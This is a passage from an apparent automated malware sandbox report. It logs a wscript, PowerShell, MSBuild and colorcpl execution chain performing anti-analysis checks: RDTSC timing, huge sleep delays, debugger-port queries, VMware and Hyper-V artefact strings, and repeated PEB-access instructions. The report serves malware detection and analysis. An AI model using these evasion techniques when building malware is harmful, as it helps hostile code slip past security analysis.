            Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2F39B6E second address: 2F39B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1258
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1961
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5194
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4510
            Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 886
            Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 9837
            Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_6-13789
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 1.9 %
            Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 2.4 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360 Thread sleep count: 5194 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep count: 4510 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316 Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep count: 134 > 30
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep time: -268000s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep count: 9837 > 30
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep time: -19674000s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
            Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000006.00000002.2938230118.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.1812503144.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
            Source: explorer.exe, 00000006.00000002.2938230118.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: wscript.exe, 00000000.00000003.1668064506.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1670550299.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
            Source: explorer.exe, 00000006.00000000.1812503144.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
            Source: explorer.exe, 00000006.00000002.2938230118.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0040ACE0 LdrLoadDll, 5_2_0040ACE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h] 5_2_0137B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379353 mov eax, dword ptr fs:[00000030h]5_2_01379353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379353 mov eax, dword ptr fs:[00000030h]5_2_01379353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144132D mov eax, dword ptr fs:[00000030h]5_2_0144132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144132D mov eax, dword ptr fs:[00000030h]5_2_0144132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137D34C mov eax, dword ptr fs:[00000030h]5_2_0137D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137D34C mov eax, dword ptr fs:[00000030h]5_2_0137D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014063C0 mov eax, dword ptr fs:[00000030h]5_2_014063C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143C3CD mov eax, dword ptr fs:[00000030h]5_2_0143C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0143B3D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B33A0 mov eax, dword ptr fs:[00000030h]5_2_013B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B33A0 mov eax, dword ptr fs:[00000030h]5_2_013B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A33A5 mov eax, dword ptr fs:[00000030h]5_2_013A33A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01378397 mov eax, dword ptr fs:[00000030h]5_2_01378397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01378397 mov eax, dword ptr fs:[00000030h]5_2_01378397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01378397 mov eax, dword ptr fs:[00000030h]5_2_01378397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F3E6 mov eax, dword ptr fs:[00000030h]5_2_0143F3E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D739A mov eax, dword ptr fs:[00000030h]5_2_013D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D739A mov eax, dword ptr fs:[00000030h]5_2_013D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A438F mov eax, dword ptr fs:[00000030h]5_2_013A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A438F mov eax, dword ptr fs:[00000030h]5_2_013A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014553FC mov eax, dword ptr fs:[00000030h]5_2_014553FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h]5_2_0137E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h]5_2_0137E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h]5_2_0137E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B63FF mov eax, dword ptr fs:[00000030h]5_2_013B63FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h]5_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h]5_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h]5_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0145539D mov eax, dword ptr fs:[00000030h]5_2_0145539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137823B mov eax, dword ptr fs:[00000030h]5_2_0137823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B256 mov eax, dword ptr fs:[00000030h]5_2_0143B256
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B256 mov eax, dword ptr fs:[00000030h]5_2_0143B256
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144D26B mov eax, dword ptr fs:[00000030h]5_2_0144D26B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144D26B mov eax, dword ptr fs:[00000030h]5_2_0144D26B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7208 mov eax, dword ptr fs:[00000030h]5_2_013B7208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7208 mov eax, dword ptr fs:[00000030h]5_2_013B7208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C1270 mov eax, dword ptr fs:[00000030h]5_2_013C1270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C1270 mov eax, dword ptr fs:[00000030h]5_2_013C1270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A9274 mov eax, dword ptr fs:[00000030h]5_2_013A9274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01384260 mov eax, dword ptr fs:[00000030h]5_2_01384260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01384260 mov eax, dword ptr fs:[00000030h]5_2_01384260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01384260 mov eax, dword ptr fs:[00000030h]5_2_01384260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137826B mov eax, dword ptr fs:[00000030h]5_2_0137826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01386259 mov eax, dword ptr fs:[00000030h]5_2_01386259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455227 mov eax, dword ptr fs:[00000030h]5_2_01455227
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A250 mov eax, dword ptr fs:[00000030h]5_2_0137A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B724D mov eax, dword ptr fs:[00000030h]5_2_013B724D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379240 mov eax, dword ptr fs:[00000030h]5_2_01379240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379240 mov eax, dword ptr fs:[00000030h]5_2_01379240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902A0 mov eax, dword ptr fs:[00000030h]5_2_013902A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902A0 mov eax, dword ptr fs:[00000030h]5_2_013902A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B329E mov eax, dword ptr fs:[00000030h]5_2_013B329E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B329E mov eax, dword ptr fs:[00000030h]5_2_013B329E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014552E2 mov eax, dword ptr fs:[00000030h]5_2_014552E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F2F8 mov eax, dword ptr fs:[00000030h]5_2_0143F2F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE284 mov eax, dword ptr fs:[00000030h]5_2_013BE284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE284 mov eax, dword ptr fs:[00000030h]5_2_013BE284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01400283 mov eax, dword ptr fs:[00000030h]5_2_01400283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01400283 mov eax, dword ptr fs:[00000030h]5_2_01400283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01400283 mov eax, dword ptr fs:[00000030h]5_2_01400283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455283 mov eax, dword ptr fs:[00000030h]5_2_01455283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013792FF mov eax, dword ptr fs:[00000030h]5_2_013792FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h]5_2_013902E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h]5_2_013902E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h]5_2_013902E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014172A0 mov eax, dword ptr fs:[00000030h]5_2_014172A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014172A0 mov eax, dword ptr fs:[00000030h]5_2_014172A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov ecx, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h]5_2_0137B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h]5_2_0137B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h]5_2_0137B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF2D0 mov eax, dword ptr fs:[00000030h]5_2_013AF2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF2D0 mov eax, dword ptr fs:[00000030h]5_2_013AF2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
